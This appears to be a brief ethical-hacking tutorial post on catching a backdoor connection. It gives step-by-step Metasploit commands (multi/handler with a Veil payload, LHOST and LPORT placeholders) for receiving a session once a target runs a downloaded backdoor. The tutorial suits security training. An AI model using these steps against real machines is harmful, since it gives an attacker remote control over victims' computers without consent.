Ethical Hacking

CLIENT SIDE ATTACKS - Listening for connections

1. Run Metasploit

Move the backdoor file to the webserver folder. And download it on the target machine.

msfconsole

2. Use the handler module.

use exploit/multi/handler

3. Set payload.

set PAYLOAD[veil payload]

4. Set IP

set LHOST[your ip]

5. Set port

set LPORT[veil port]

6. exploit

 Waiting for a connection ...

Once run the backdoor file on the target machine, a session is established.

相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
原文地址:https://www.cnblogs.com/keepmoving1113/p/12128171.html